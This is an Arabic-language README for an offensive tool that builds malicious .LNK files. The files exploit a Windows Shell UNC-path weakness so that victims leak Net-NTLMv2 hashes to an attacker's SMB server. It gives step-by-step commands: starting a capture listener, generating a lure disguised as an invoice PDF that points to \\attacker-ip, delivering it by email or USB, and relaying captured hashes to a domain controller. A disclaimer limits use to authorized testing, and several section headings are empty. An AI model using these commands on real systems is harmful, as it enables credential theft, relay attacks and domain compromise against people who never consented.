
يولّد ملفات LNK خبيثة لانتزاع تجزئات Net-NTLMv2 عبر معالجة Windows Shell لـ UNC، مع مستمع SMB مخصص وتكامل ترحيل لعمليات الفريق الأحمر المصرح بها.
إخلاء مسؤولية
هذه الأداة مخصّصة لاختبار الاختراق والقرصنة الأخلاقية المصرّح بها فقط.
الاستخدام غير المصرّح به ضد الأنظمة دون إذن صريح غير قانوني.
استخدمها على مسؤوليتك الخاصة. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر.
الوصف
إجبار على تسريب تجزئة NTLMv2 عبر تجاوز حماية Windows Shell غير المكتملة (CVE-2026-32202). تُنشئ ملفات LNK مصمّمة خصيصًا تُجبر على مصادقة SMB/UNC عند الفتح أو المعاينة في Explorer. تفاعل منخفض، وتعمل على الأنظمة المحدّثة حيث كان إصلاح أبريل 2026 غير كافٍ. تُستخدم بنشاط في المهام الميدانية.
الميزات الرئيسية
ما الذي يفعله الاستغلال
تُنشئ الأداة ملف .LNK مصمّمًا يستغل معالجة Shell لمسارات UNC في Target + IconEnvironmentDataBlock / هياكل ExtraData. عندما يتصفّح الضحية المجلد أو يمرّر المؤشر/يعاين الملف، يبدأ Windows Shell اتصال SMB بمسار UNC المتحكم فيه من المهاجم، مما يسرّب تجزئة Net-NTLMv2 الخاصة بالجهاز/المستخدم. لا يوجد تنفيذ كود على الهدف - فقط إجبار على تسريب بيانات الاعتماد لإعادة التوجيه أو الكسر.
لماذا هي مفيدة
تم اختبارها على
التبعيات
التثبيت: pip install -r requirements.txt
الاستخدام
# 1. تشغيل خادم الالتقاط (جهاز المهاجم)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. توليد LNK خبيث
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# اختياري: الوضع المستقر أو وضع التجاوز
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. تسليم LNK (USB، مشاركة، مرفق بريد إلكتروني، OneDrive، إلخ.)
# 4. انتظر التجزئة في الطرفية + الملف. مثال لإعادة التوجيه:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# أو إعادة توجيه LDAP لـ RBCD، HTTP لشهادات ADCS، إلخ.
الاستغلال
القيود
السبب الجذري (باختصار)
إصلاح غير مكتمل في تعقيم مسار UNC في Windows Shell ومعالجة كتلة ExtraData لدقة أيقونة/هدف LNK. آلية الحماية التي كان من المفترض أن تمنع انتحال الشبكة غير المصرّح به لا تزال تُطلق مصادقة NTLM أثناء تعداد مساحة اسم Shell.